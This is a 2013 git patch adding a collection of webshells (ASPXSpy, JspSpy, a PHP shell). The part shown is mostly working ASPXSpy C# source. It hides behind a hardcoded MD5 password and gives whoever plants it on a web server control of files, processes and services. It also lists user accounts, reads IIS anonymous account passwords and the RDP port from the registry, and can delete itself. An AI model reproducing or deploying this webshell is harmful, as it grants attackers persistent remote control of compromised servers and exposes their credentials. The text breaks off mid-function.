From 98001733faf081e8a274601ce21500c7b5954d06 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Sat, 12 Oct 2013 11:18:33 +0800
Subject: [PATCH] update 3 spy

aspx php  jsp 3 spy
---
 asp/ASPXspy2.aspx   | 2579 +++++++++++++++++++++++++++++++++++++++++++
 jsp/JspSpy.jsp      | 2344 +++++++++++++++++++++++++++++++++++++++
 jsp/JspSpy1.jsp     | 2344 +++++++++++++++++++++++++++++++++++++++
 jsp/JspSpyJDK51.jsp | 2323 ++++++++++++++++++++++++++++++++++++++
 php/2011.php        | 2144 +++++++++++++++++++++++++++++++++++
 5 files changed, 11734 insertions(+)
 create mode 100644 asp/ASPXspy2.aspx
 create mode 100644 jsp/JspSpy.jsp
 create mode 100644 jsp/JspSpy1.jsp
 create mode 100644 jsp/JspSpyJDK51.jsp
 create mode 100644 php/2011.php

diff --git a/asp/ASPXspy2.aspx b/asp/ASPXspy2.aspx
new file mode 100644
index 0000000..0df158b
--- /dev/null
+++ b/asp/ASPXspy2.aspx
@@ -0,0 +1,2579 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>

+<%@ import Namespace="System.IO"%>

+<%@ import Namespace="System.Diagnostics"%>

+<%@ import Namespace="System.Data"%>

+<%@ import Namespace="System.Management"%>

+<%@ import Namespace="System.Data.OleDb"%>

+<%@ import Namespace="Microsoft.Win32"%>

+<%@ import Namespace="System.Net.Sockets" %>

+<%@ import Namespace="System.Net" %>

+<%@ import Namespace="System.Runtime.InteropServices"%>

+<%@ import Namespace="System.DirectoryServices"%>

+<%@ import Namespace="System.ServiceProcess"%>

+<%@ import Namespace="System.Text.RegularExpressions"%>

+<%@ Import Namespace="System.Threading"%>

+<%@ Import Namespace="System.Data.SqlClient"%>

+<%@ import Namespace="Microsoft.VisualBasic"%>

+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

+<script runat="server">

+public string Password="21232f297a57a5a743894a0e4a801fc3";//admin

+public string vbhLn="ASPXSpy";

+public int TdgGU=3-2;

+protected OleDbConnection Dtdr=new OleDbConnection();

+protected OleDbCommand Kkvb=new OleDbCommand();

+public NetworkStream NS=null;

+public NetworkStream NS1=null;

+TcpClient tcp=new TcpClient();

+TcpClient zvxm=new TcpClient();

+ArrayList IVc=new ArrayList();

+protected void Page_load(object sender,EventArgs e)

+{

+YFcNP(this);

+fhAEn();

+if (!pdo())

+{

+return;

+}

+if(IsPostBack)

+{

+string tkI=Request["__EVENTTARGET"];

+string VqV=Request["__File"];

+if(tkI!="")

+{

+switch(tkI)

+{

+case "Bin_Parent":

+krIR(Ebgw(VqV));

+break;

+case "Bin_Listdir":

+krIR(Ebgw(VqV));

+break;

+case "kRXgt":

+kRXgt(Ebgw(VqV));

+break;

+case "Bin_Createfile":

+gLKc(VqV);

+break;

+case "Bin_Editfile":

+gLKc(VqV);

+break;

+case "Bin_Createdir":

+stNPw(VqV);

+break;

+case "cYAl":

+cYAl(VqV);

+break;

+case "ksGR":

+ksGR(Ebgw(VqV));

+break;

+case "SJv":

+SJv(VqV);

+break;

+case "Bin_Regread":

+tpRQ(Ebgw(VqV));

+break;

+case "hae":

+hae();

+break;

+case "urJG":

+urJG(VqV);

+break;

+}

+if(tkI.StartsWith("dAJTD"))

+{

+dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);

+}

+else if(tkI.StartsWith("Tlvz"))

+{

+Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);

+}

+else if(tkI.StartsWith("Bin_CFile"))

+{

+YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);

+}

+}

+}

+else

+{

+PBZw();

+}

+}

+public bool pdo()

+{

+if(Request.Cookies[vbhLn]==null)

+{

+tZSx();

+return false;

+}

+else

+{

+if (Request.Cookies[vbhLn].Value != Password)

+{

+tZSx();

+return false;

+}

+else

+{

+return true;

+}

+}

+}

+public void tZSx()

+{

+ljtzC.Visible=true;

+ZVS.Visible=false;

+}

+protected void YKpI(object sender,EventArgs e)

+{

+Session.Abandon();

+Response.Cookies.Add(new HttpCookie(vbhLn,null));

+tZSx();

+}

+public void PBZw()

+{

+ZVS.Visible=true;

+ljtzC.Visible=false;

+Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";

+Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";

+Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";

+miansha2.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";

+Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();

+if (AXSbb.Value==string.Empty)

+{

+AXSbb.Value=OElM(Server.MapPath("."));

+}

+Bin_H2_Title.InnerText="File Manager >>";

+krIR(AXSbb.Value);

+}

+public void fhAEn()

+{

+try

+{

+string[] YRgt=Directory.GetLogicalDrives();

+for(int i=0;i<YRgt.Length;i++)

+{

+Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");

+Bin_Span_Drv.Controls.Add(c);

+LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);

+nxeDR.Command+=new CommandEventHandler(this.iVk);

+}

+}catch(Exception ex){}

+}

+public string OElM(string path)

+{

+if(path.Substring(path.Length-1,1)!=@"\")

+{

+path=path+@"\";

+}

+return path;

+}

+public string nrrx(string path)

+{

+char[] trim={'\\'};

+if(path.Substring(path.Length-1,1)==@"\")

+{

+path=path.TrimEnd(trim);

+}

+return path;

+}

+[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]

+public static extern int OMZP(string nDrive);

+public string mFvj(string instr)

+{

+string EuXD=string.Empty;

+int num=OMZP(instr);

+switch(num)

+{

+case 1:

+EuXD="Unknow("+instr+")";

+break;

+case 2:

+EuXD="Removable("+instr+")";

+break;

+case 3:

+EuXD="Fixed("+instr+")";

+break;

+case 4:

+EuXD="Network("+instr+")";

+break;

+case 5:

+EuXD="CDRom("+instr+")";

+break;

+case 6:

+EuXD="RAM Disk("+instr+")";

+break;

+}

+return EuXD.Replace(@"\","");

+}

+public string MVVJ(string instr)

+{

+byte[] tmp=Encoding.Default.GetBytes(instr);

+return Convert.ToBase64String(tmp);

+}

+public string Ebgw(string instr)

+{

+byte[] tmp=Convert.FromBase64String(instr);

+return Encoding.Default.GetString(tmp);

+}

+public void krIR(string path)

+{

+WICxe();

+CzfO.Visible=true;

+Bin_H2_Title.InnerText="File Manager >>";

+AXSbb.Value=OElM(path);

+DirectoryInfo GQMM=new DirectoryInfo(path);

+if(Directory.GetParent(nrrx(path))!=null)

+{

+string bg=OKM();

+TableRow p=new TableRow();

+for(int i=1;i<6;i++)

+{

+TableCell pc=new TableCell();

+if(i==1)

+{

+pc.Width=Unit.Parse("2%");

+pc.Text="0";

+p.CssClass=bg;

+}

+if(i==2)

+{

+pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";

+}

+p.Cells.Add(pc);

+UGzP.Rows.Add(p);

+}

+}

+try

+{

+int vLlH=0;

+foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())

+{

+string bg=OKM();

+vLlH++;

+TableRow tr=new TableRow();

+TableCell tc=new TableCell();

+tc.Width=Unit.Parse("2%");

+tc.Text="0";

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tr.Cells.Add(tc);

+TableCell HczyN=new TableCell();

+HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";

+tr.Cells.Add(HczyN);

+TableCell LYZK=new TableCell();

+LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");

+tr.Cells.Add(LYZK);

+UGzP.Rows.Add(tr);

+TableCell ERUL=new TableCell();

+ERUL.Text="--";

+tr.Cells.Add(ERUL);

+UGzP.Rows.Add(tr);

+TableCell ZGKh=new TableCell();

+ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";

+tr.Cells.Add(ZGKh);

+UGzP.Rows.Add(tr);

+}

+TableRow cKVA=new TableRow();

+cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";

+cKVA.Attributes["bgcolor"]="#dddddd";

+TableCell JlmW=new TableCell();

+JlmW.Attributes["colspan"]="6" ;

+JlmW.Attributes["height"]="5";

+cKVA.Cells.Add(JlmW);

+UGzP.Rows.Add(cKVA);

+int aYRwo=0;

+foreach(FileInfo Bin_Files in GQMM.GetFiles())

+{

+aYRwo++;

+string gb=OKM();

+TableRow tr=new TableRow();

+TableCell tc=new TableCell();

+tc.Width=Unit.Parse("2%");

+tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=gb;

+tr.Attributes["onmouseout"]="this.className='"+gb+"';";

+tr.Cells.Add(tc);

+TableCell filename=new TableCell();

+if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))

+{

+string url=Request.Url.ToString();

+filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";

+}

+else

+{

+filename.Text=Bin_Files.Name;

+}

+TableCell albt=new TableCell();

+albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");

+TableCell YzK=new TableCell();

+YzK.Text=mTG(Bin_Files.Length);

+TableCell GLpi=new TableCell();

+GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";

+tr.Cells.Add(filename);

+tr.Cells.Add(albt);

+tr.Cells.Add(YzK);

+tr.Cells.Add(GLpi);

+UGzP.Rows.Add(tr);

+}

+string lgb=OKM();

+TableRow oWam=new TableRow();

+oWam.CssClass=lgb;

+for(int i=1;i<4;i++)

+{

+TableCell lGV=new TableCell();

+if(i==1)

+{

+lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";

+}

+if(i==2)

+{

+lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";

+}

+if(i==3)

+{

+lGV.ColumnSpan=4;

+lGV.Style.Add("text-align","right");

+lGV.Text=vLlH+" directories/ "+aYRwo+" files";

+}

+oWam.Cells.Add(lGV);

+}

+UGzP.Rows.Add(oWam);

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public string OKM()

+{

+TdgGU++;

+if(TdgGU % 2==0)

+{

+return "alt1";

+}

+else

+{

+return "alt2";

+}

+}

+public void kRXgt(string qcKu)

+{

+try

+{

+Directory.Delete(qcKu,true);

+xseuB("Directory delete new success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(Directory.GetParent(qcKu).ToString());

+}

+public void dAJTD(string sdir,string ddir)

+{

+try

+{

+Directory.Move(sdir,ddir);

+xseuB("Directory Renamed Success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+public void Tlvz(string sfile,string dfile)

+{

+try

+{

+File.Move(sfile,dfile);

+xseuB("File Renamed Success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+public void YByN(string spath,string dpath)

+{

+try

+{

+File.Copy(spath,dpath);

+xseuB("File Copy Success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+public void stNPw(string path)

+{

+try

+{

+Directory.CreateDirectory(AXSbb.Value+path);

+xseuB("Directory created success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+public void gLKc(string path)

+{

+if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")

+{

+foreach(ListItem item in NdCX.Items)

+{

+if(item.Selected=true)

+{

+item.Selected=false;

+}

+}

+}

+Bin_H2_Title.InnerHtml="Create/ Edit File >>";

+WICxe();

+vrFA.Visible=true;

+if(path.IndexOf(":")< 0)

+{

+Sqon.Value=AXSbb.Value+path;

+}

+else

+{

+Sqon.Value=path;

+}

+if(File.Exists(Sqon.Value))

+{

+StreamReader sr;

+if(NdCX.SelectedItem.Text=="UTF-8")

+{

+sr=new StreamReader(Sqon.Value,Encoding.UTF8);

+}

+else

+{

+sr=new StreamReader(Sqon.Value,Encoding.Default);

+}

+Xgvv.InnerText=sr.ReadToEnd();

+sr.Close();

+}

+else

+{

+Xgvv.InnerText=string.Empty;

+}

+}

+public void ksGR(string path)

+{

+FileInfo fs=new FileInfo(path);

+Response.Clear();

+Page.Response.ClearHeaders();

+Page.Response.Buffer=false;

+this.EnableViewState=false;

+Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));

+Response.AddHeader("Content-Length",fs.Length.ToString());

+Page.Response.ContentType="application/unknown";

+Response.WriteFile(fs.FullName);

+Page.Response.Flush();

+Page.Response.Close();

+Response.End();

+Page.Response.Clear();

+}

+public void SJv(string path)

+{

+try

+{

+string[] spdT=path.Split(',');

+for(int i=0;i<spdT.Length-1;i++)

+{

+File.Delete(AXSbb.Value+Ebgw(spdT[i]));

+}

+xseuB("File Delete Success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+public void hae()

+{

+try

+{

+File.Delete(Request.PhysicalPath);

+Response.Redirect("http://www.rootkit.net.cn");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public void cYAl(string path)

+{

+Bin_H2_Title.InnerHtml="Clone file was last modified time >>";

+WICxe();

+zRyG.Visible=true;

+QiFB.Value=AXSbb.Value+path;

+lICp.Value=AXSbb.Value;

+pWVL.Value=AXSbb.Value+path;

+string Att=File.GetAttributes(QiFB.Value).ToString();

+if(Att.LastIndexOf("ReadOnly")!=-1)

+{

+ZhWSK.Checked=true;

+}

+if(Att.LastIndexOf("System")!=-1)

+{

+SsR.Checked=true;

+}

+if(Att.LastIndexOf("Hidden")!=-1)

+{

+ccB.Checked=true;

+}

+if(Att.LastIndexOf("Archive")!=-1)

+{

+fbyZ.Checked=true;

+}

+yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();

+uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();

+aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();

+}

+public static String mTG(Int64 fileSize)

+{

+if(fileSize<0)

+{

+throw new ArgumentOutOfRangeException("fileSize");

+}

+else if(fileSize >= 1024 * 1024 * 1024)

+{

+return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));

+}

+else if(fileSize >= 1024 * 1024)

+{

+return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));

+}

+else if(fileSize >= 1024)

+{

+return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);

+}

+else

+{

+return string.Format("{0} B",fileSize);

+}

+}

+private bool SGde(string sSrc)

+{

+Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");

+if(reg.IsMatch(sSrc))

+{

+return true;

+}

+else

+{

+return false;

+}

+}

+public void AdCx()

+{

+string qcKu=string.Empty;

+string mWGEm="IIS://localhost/W3SVC";

+GlI.Style.Add("word-break","break-all");

+try

+{

+DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);

+int fmW=0;

+foreach(DirectoryEntry child in HHzcY.Children)

+{

+if(SGde(child.Name.ToString()))

+{

+fmW++;

+DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());

+DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");

+string bg=OKM();

+TableRow TR=new TableRow();

+TR.Attributes["onmouseover"]="this.className='focus';";

+TR.CssClass=bg;

+TR.Attributes["onmouseout"]="this.className='"+bg+"';";

+TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();

+for(int i=1;i<6;i++)

+{

+try

+{

+TableCell tfit=new TableCell();

+switch(i)

+{case 1:

+tfit.Text=fmW.ToString();

+break;

+case 2:

+tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();

+break;

+case 3:

+tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();

+break;

+case 4:

+StringBuilder sb=new StringBuilder();

+PropertyValueCollection pc=child.Properties["ServerBindings"];

+for (int j=0; j < pc.Count; j++)

+{

+sb.Append(pc[j].ToString()+"<br>");

+}

+tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);

+break;

+case 5:

+tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";

+break;

+}

+TR.Cells.Add(tfit);

+}

+catch (Exception ex)

+{

+xseuB(ex.Message);

+continue;

+}

+}

+GlI.Controls.Add(TR);

+}

+}

+}

+catch(Exception ex)

+{

+xseuB(ex.Message);

+}

+}

+public ManagementObjectCollection PhQTd(string query)

+{

+ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));

+return QS.Get();

+}

+public DataTable cCf(string query)

+{

+DataTable dt=new DataTable();

+int i=0;

+ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));

+try

+{

+foreach(ManagementObject m in QS.Get())

+{

+DataRow dr=dt.NewRow();

+PropertyDataCollection.PropertyDataEnumerator oEnum;

+oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);

+while(oEnum.MoveNext())

+{

+PropertyData DRU=(PropertyData)oEnum.Current;

+if(dt.Columns.IndexOf(DRU.Name)==-1)

+{

+dt.Columns.Add(DRU.Name);

+dt.Columns[dt.Columns.Count-1].DefaultValue="";

+}

+if(m[DRU.Name]!=null)

+{

+dr[DRU.Name]=m[DRU.Name].ToString();

+}

+else

+{

+dr[DRU.Name]=string.Empty;

+}

+}

+dt.Rows.Add(dr);

+}

+}

+catch(Exception error)

+{

+}

+return dt;

+}

+public void YUw()

+{

+try

+{

+Bin_H2_Title.InnerText="Process >>";

+WICxe();

+DCbS.Visible=true;

+int UEbTI=0;

+Process[] p=Process.GetProcesses();

+foreach(Process sp in p)

+{

+UEbTI++;

+string bg=OKM();

+TableRow tr=new TableRow();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+for(int i=1;i<7;i++)

+{

+TableCell td=new TableCell();

+if(i==1)

+{

+td.Width=Unit.Parse("2%");

+td.Text=UEbTI.ToString();

+tr.Controls.Add(td);

+}

+if(i==2)

+{

+td.Text=sp.Id.ToString();

+tr.Controls.Add(td);

+}

+if(i==3)

+{

+td.Text=sp.ProcessName.ToString();

+tr.Controls.Add(td);

+}

+if(i==4)

+{

+td.Text=sp.Threads.Count.ToString();

+tr.Controls.Add(td);

+}

+if(i==5)

+{

+td.Text=sp.BasePriority.ToString();

+tr.Controls.Add(td);

+}

+if(i==6)

+{

+td.Text="--";

+tr.Controls.Add(td);

+}

+}

+IjsL.Controls.Add(tr);

+}

+}

+catch(Exception error)

+{

+AIz();

+}

+AIz();

+}

+public void AIz()

+{

+try

+{

+Bin_H2_Title.InnerText="Process >>";

+WICxe();

+DCbS.Visible=true;

+int UEbTI=0;

+DataTable dt=cCf("Win32_Process");

+for(int j=0;j<dt.Rows.Count;j++)

+{

+UEbTI++;

+string bg=OKM();

+TableRow tr=new TableRow();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+for(int i=1;i<7;i++)

+{

+TableCell td=new TableCell();

+if(i==1)

+{

+td.Width=Unit.Parse("2%");

+td.Text=UEbTI.ToString();

+tr.Controls.Add(td);

+}

+if(i==2)

+{

+td.Text=dt.Rows[j]["ProcessID"].ToString();

+tr.Controls.Add(td);

+}

+if(i==3)

+{

+td.Text=dt.Rows[j]["Name"].ToString();

+tr.Controls.Add(td);

+}

+if(i==4)

+{

+td.Text=dt.Rows[j]["ThreadCount"].ToString();

+tr.Controls.Add(td);

+}

+if(i==5)

+{

+td.Text=dt.Rows[j]["Priority"].ToString();

+tr.Controls.Add(td);

+}

+if(i==6)

+{

+if( dt.Rows[j]["CommandLine"]!=string.Empty)

+{

+td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";

+}

+else

+{

+td.Text="--";

+}

+tr.Controls.Add(td);

+}

+}

+IjsL.Controls.Add(tr);

+}

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public void urJG(string pid)

+{

+try

+{

+foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))

+{

+p.InvokeMethod("Terminate",null);

+p.Dispose();

+}

+xseuB("Process Kill Success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+AIz();

+}

+public void oHpF()

+{

+try

+{

+Bin_H2_Title.InnerText="Services >>";

+WICxe();

+iQxm.Visible=true;

+int UEbTI=0;

+ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();

+for(int i=0;i<kQmRu.Length;i++)

+{

+UEbTI++;

+string bg=OKM();

+TableRow tr=new TableRow();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+for(int b=1;b<7;b++)

+{

+TableCell td=new TableCell();

+if(b==1)

+{

+td.Width=Unit.Parse("2%");

+td.Text=UEbTI.ToString();

+tr.Controls.Add(td);

+}

+if(b==2)

+{

+td.Text="null";

+tr.Controls.Add(td);

+}

+if(b==3)

+{

+td.Text=kQmRu[i].ServiceName.ToString();

+tr.Controls.Add(td);

+}

+if(b==4)

+{

+td.Text="";

+tr.Controls.Add(td);

+}

+if(b==5)

+{

+string kOIo=kQmRu[i].Status.ToString();

+if(kOIo=="Running")

+{

+td.Text="<font color=green>"+kOIo+"</font>";

+}

+else

+{

+td.Text="<font color=red>"+kOIo+"</font>";

+}

+tr.Controls.Add(td);

+}

+if(b==6)

+{

+td.Text="";

+tr.Controls.Add(td);

+}

+}

+vHCs.Controls.Add(tr);

+}

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public void tZRH()

+{

+try

+{

+Bin_H2_Title.InnerText="Services >>";

+WICxe();

+iQxm.Visible=true;

+int UEbTI=0;

+DataTable dt=cCf("Win32_Service");

+for(int j=0;j<dt.Rows.Count;j++)

+{

+UEbTI++;

+string bg=OKM();

+TableRow tr=new TableRow();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();

+for(int i=1;i<7;i++)

+{

+TableCell td=new TableCell();

+if(i==1)

+{

+td.Width=Unit.Parse("2%");

+td.Text=UEbTI.ToString();

+tr.Controls.Add(td);

+}

+if(i==2)

+{

+td.Text=dt.Rows[j]["ProcessID"].ToString();

+tr.Controls.Add(td);

+}

+if(i==3)

+{

+td.Text=dt.Rows[j]["Name"].ToString();

+tr.Controls.Add(td);

+}

+if(i==4)

+{

+td.Text=dt.Rows[j]["PathName"].ToString();

+tr.Controls.Add(td);

+}

+if(i==5)

+{

+string kOIo=dt.Rows[j]["State"].ToString();

+if(kOIo=="Running")

+{

+td.Text="<font color=green>"+kOIo+"</font>";

+}

+else

+{

+td.Text="<font color=red>"+kOIo+"</font>";

+}

+tr.Controls.Add(td);

+}

+if(i==6)

+{

+td.Text=dt.Rows[j]["StartMode"].ToString();

+tr.Controls.Add(td);

+}

+}

+vHCs.Controls.Add(tr);

+}

+}

+catch(Exception error)

+{

+oHpF();

+}

+}

+public void PLd()

+{

+try

+{

+WICxe();

+xWVQ.Visible=true;

+Bin_H2_Title.InnerText="User Information >>";

+DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());

+foreach(DirectoryEntry child in TWQ.Children)

+{

+foreach(string name in child.Properties.PropertyNames)

+{

+PropertyValueCollection pvc=child.Properties[name];

+int c=pvc.Count;

+for(int i=0;i<c;i++)

+{

+if(name!="objectSid" && name!="Parameters" && name!="LoginHours")

+{

+string bg=OKM();

+TableRow tr=new TableRow();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+TableCell td=new TableCell();

+td.Text=name;

+tr.Controls.Add(td);

+TableCell td1=new TableCell();

+td1.Text=pvc[i].ToString();

+tr.Controls.Add(td1);

+VPa.Controls.Add(tr);

+}

+}

+}

+TableRow trn=new TableRow();

+for(int x=1;x<3;x++)

+{

+TableCell tdn=new TableCell();

+tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";

+trn.Controls.Add(tdn);

+VPa.Controls.Add(trn);

+}

+}

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public void iLVUT()

+{

+try

+{

+WICxe();

+xWVQ.Visible=true;

+Bin_H2_Title.InnerText="User Information >>";

+DataTable user=cCf("Win32_UserAccount");

+for(int i=0;i<user.Rows.Count;i++)

+{

+for(int j=0;j<user.Columns.Count;j++)

+{

+string bg=OKM();

+TableRow tr=new TableRow();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+TableCell td=new TableCell();

+td.Text=user.Columns[j].ToString();

+tr.Controls.Add(td);

+TableCell td1=new TableCell();

+td1.Text=user.Rows[i][j].ToString();

+tr.Controls.Add(td1);

+VPa.Controls.Add(tr);

+}

+TableRow trn=new TableRow();

+for(int x=1;x<3;x++)

+{

+TableCell tdn=new TableCell();

+tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";

+trn.Controls.Add(tdn);

+VPa.Controls.Add(trn);

+}

+}

+}

+catch(Exception error)

+{

+PLd();

+}

+}

+public void pDVM()

+{

+try

+{

+RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");

+string IKjwH=DdmPl(EeZ,"PortNumber");

+RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");

+int cpu=izN.SubKeyCount;

+RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");

+string NPPZ=DdmPl(mQII,"ProcessorNameString");

+WICxe();

+ghaB.Visible=true;

+Bin_H2_Title.InnerText="System Information >>";

